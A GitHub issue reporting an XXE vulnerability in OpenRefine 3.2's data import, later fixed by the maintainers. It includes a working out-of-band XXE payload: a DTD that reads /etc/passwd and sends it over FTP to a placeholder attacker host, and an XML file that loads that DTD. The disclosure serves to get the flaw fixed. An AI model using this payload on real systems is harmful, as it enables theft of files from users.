Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

XXE vulnerability in creating project #1907

Closed
itsacoderepo opened this issue Dec 14, 2018 · 0 comments
Closed

XXE vulnerability in creating project #1907

itsacoderepo opened this issue Dec 14, 2018 · 0 comments
Assignees
@wetneb
Labels
vulnerability Security vulnerability which needs fixing
Milestone
3.2

Comments

@itsacoderepo
Copy link

Describe the bug
OpenRefine 3.2 (and below) has a XXE vulnerability, that can be triggered through a data import. It is possible to steal data from an OpenRefine user.

Please consider disabling external DTDs.

To Reproduce
See the video (zipped because of GH file extension restrictions) xxe.zip

Current Results
File content is send over FTP, no feedback is shown to the user.

Desktop (please complete the following information):
Tested on (desktop version is not important)

$ java -version
openjdk version "1.8.0_192"
OpenJDK Runtime Environment (build 1.8.0_192-b26)
OpenJDK 64-Bit Server VM (build 25.192-b26, mixed mode)

OpenRefine (please complete the following information):

  • Version 3.2 (and below)

Datasets
ext.dtd

<!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:5555/%d;'>">

payload.xml

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd">
%asd;
%c;
]>
<a>&rrr;</a>

Additonal info
Sorry that i was a bit inactive during the last issue :).
@itsacoderepo itsacoderepo changed the title XXE Vulnerability in creating project XXE vulnerability in creating project Dec 14, 2018
@wetneb wetneb self-assigned this Dec 31, 2018
@wetneb wetneb added the pull request pending For issues that will be fixed by an open PR label Dec 31, 2018
@wetneb wetneb closed this as completed in 6a0d7d5 Jan 7, 2019
@wetneb wetneb added vulnerability Security vulnerability which needs fixing and removed pull request pending For issues that will be fixed by an open PR labels Jan 26, 2019
@wetneb wetneb added this to the 3.2 milestone Mar 1, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@wetneb wetneb

Labels
vulnerability Security vulnerability which needs fixing
Projects
None yet
Milestone
3.2
Development

No branches or pull requests
2 participants
@wetneb @itsacoderepo